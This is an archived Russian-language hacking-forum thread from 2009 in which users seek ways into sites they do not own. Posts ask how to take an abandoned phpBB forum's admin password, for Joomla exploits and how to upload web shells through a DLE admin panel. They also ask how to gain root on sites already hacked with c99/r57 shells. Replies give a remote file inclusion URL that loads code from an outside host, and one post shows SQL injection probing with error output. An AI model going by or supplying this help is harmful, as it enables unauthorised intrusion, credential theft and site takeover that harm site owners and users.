HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 18.05.2009, 20:49
Alfer
Новичок
Регистрация: 23.07.2008
Сообщений: 25
Провел на форуме:
137357

Репутация: 75
По умолчанию

Всеобщее здрасьте! Подскажите пожалуйста, есть форум на phpbb 2.0.5 версии, старыыый вхлам, админы уже наверное с 2005 года там нет, один модератор бедный трудится как может, кароче форум уже загибается, много чего уже не работает попросту, скажите, вот возможно как-нибудь узнать пасс админа. Ну точнее, способов много, но раз форум старый, какой будет самый простой и недолгий способ?
 
Ответить с цитированием

  #2  
Старый 04.06.2009, 13:21
Noker
Новичок
Регистрация: 27.10.2008
Сообщений: 3
Провел на форуме:
20280

Репутация: 0
По умолчанию

Подскажите рабочий эксплоит для версии Joomla 1.0.13.Или есть какие нибуть актуальные баги для этой версии?

Последний раз редактировалось Noker; 04.06.2009 в 13:22.. Причина: Орфография
 
Ответить с цитированием

  #3  
Старый 07.06.2009, 03:48
-=Razor=-
Новичок
Регистрация: 20.12.2008
Сообщений: 24
Провел на форуме:
1187799

Репутация: 62
По умолчанию

Цитата:
Сообщение от Noker  
Подскажите рабочий эксплоит для версии Joomla 1.0.13.Или есть какие нибуть актуальные баги для этой версии?
exploit:
http://joomla/index.php?mosConfig_absolute_path=http://site.ru/php.txt
Цитата:
Сообщение от Alfer  
Подскажите пожалуйста, есть форум на phpbb 2.0.5 версии
Exploit: http://milw0rm.com/id.php?id=44
 
Ответить с цитированием

  #4  
Старый 07.06.2009, 06:53
hookman
Познающий
Регистрация: 16.02.2009
Сообщений: 45
Провел на форуме:
233429

Репутация: 66
Отправить сообщение для hookman с помощью ICQ
По умолчанию

Цитата:
Сообщение от Noker  
Подскажите рабочий эксплоит для версии Joomla 1.0.13.Или есть какие нибуть актуальные баги для этой версии?
Уязвимости джумлы больше зависят от компонентов которые в ней установлены чем от версии, имхо. ищи баги в компонентах.
 
Ответить с цитированием

  #5  
Старый 09.06.2009, 07:00
hookman
Познающий
Регистрация: 16.02.2009
Сообщений: 45
Провел на форуме:
233429

Репутация: 66
Отправить сообщение для hookman с помощью ICQ
По умолчанию

Сижу ковыряю джумлу. Вродь как что то есть в модуле com_exitpoll.
при запросе
Код:
index.php?option=com_exitpoll&task=results&id=1/**/order/**/by/**/1/*
 ошибок нет, слепой тоже вроди нету.
при запросе
Код:
index.php?option=com_exitpoll&task=results&id=-1/**/order/**/by/**/1/*
 Выдаёт ошибку следующего вида
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'\' at line 4 SQL=SELECT IF ((resfrom <= \'2009-06-09\' OR resfrom=\'0000-00-00 00:00:00\') AND\n (resto >= \'2009-06-09\' OR resto=\'0000-00-00 00:00:00\')\n , 1 , 0) AS shw_result\n FROM pros_exitpoll WHERE id=   далее поидее должен ити -1, но там кнопочка стоит и видать -1 просто невидно
если это поможет вот этот эрор из исходника страницы
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'\' at line 4 SQL=SELECT IF ((resfrom <= \'2009-06-09\' OR resfrom=\'0000-00-00 00:00:00\') AND\n								 		 (resto >= \'2009-06-09\' OR resto=\'0000-00-00 00:00:00\')\n								 		 , 1 , 0) AS shw_result\n								FROM pros_exitpoll WHERE id=<input class="button" type="button" value="Продолжить" onclick="window.history.go(-1);" />
Собсно подскажите чё с этим можно сделать ибо я в потерях.
 
Ответить с цитированием

  #6  
Старый 14.06.2009, 15:14
AGRESOR
Новичок
Регистрация: 06.07.2008
Сообщений: 24
Провел на форуме:
150387

Репутация: 0
Отправить сообщение для AGRESOR с помощью ICQ
По умолчанию

Доброе время суток всем . Народ как залить шел через админку в dle 7.5 ?
 
Ответить с цитированием

  #7  
Старый 14.06.2009, 21:38
KaZ@NoVa
Постоянный
Регистрация: 05.07.2008
Сообщений: 555
Провел на форуме:
3134311

Репутация: 1467


Отправить сообщение для KaZ@NoVa с помощью ICQ Отправить сообщение для KaZ@NoVa с помощью AIM Отправить сообщение для KaZ@NoVa с помощью Yahoo
По умолчанию

Цитата:
Сообщение от AGRESOR  
Доброе время суток всем . Народ как залить шел через админку в dle 7.5 ?
Если у хостига стоит антивир, то это бесполезно... так как шел в любой форме воспринимать как троян...
А вообще попробуй его подгрузить как картинку если есть такая возможность..

вот здесь искал??
http://damagelab.org/lofiversion/index.php?t=16780
 
Ответить с цитированием

  #8  
Старый 15.06.2009, 19:43
MaXoH999
Новичок
Регистрация: 06.06.2009
Сообщений: 2
Провел на форуме:
815

Репутация: 0
По умолчанию

Подскажите, пожалуйста, как можно поменять chmod на сайтах, взломанных с помощью shellа? Мало, кто сейчас ставит права 777, тем более на главный файл index.php. Шелл (c99 или r57) заливаю с помощью уязвимостей, но практически ничего не могу сделать из-за прав, а права не хотят меняться. Может есть какой способ их поменять, может с помощью другой утилиты или шелла?
 
Ответить с цитированием

  #9  
Старый 15.06.2009, 19:56
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию

MaXoH999 если с шеллом не хотять менятся права то иши какойнить сплоит рутовый!
 
Ответить с цитированием

  #10  
Старый 16.06.2009, 01:57
MaXoH999
Новичок
Регистрация: 06.06.2009
Сообщений: 2
Провел на форуме:
815

Репутация: 0
По умолчанию

Цитата:
Сообщение от Rubaka  
MaXoH999 если с шеллом не хотять менятся права то иши какойнить сплоит рутовый!
А ещё кроме этого есть какой-нибудь способ поменять права или узнать фтп логин и пароль?
Хорошо и ещё...если я знаю логин и пароль к phpmyadmin, то с помощью этого как-нибудь рут-доступ можно поставить "гостю"?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Задай Вопрос - Получи Ответ] ZAMUT Уязвимости CMS / форумов 316 08.06.2010 09:56
Интернетчики задали российскому президенту очень странные вопросы podkashey Мировые новости. Обсуждения. 4 07.07.2006 16:53
Простой вопрос про сниффер errou PHP 15 30.01.2006 20:54



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ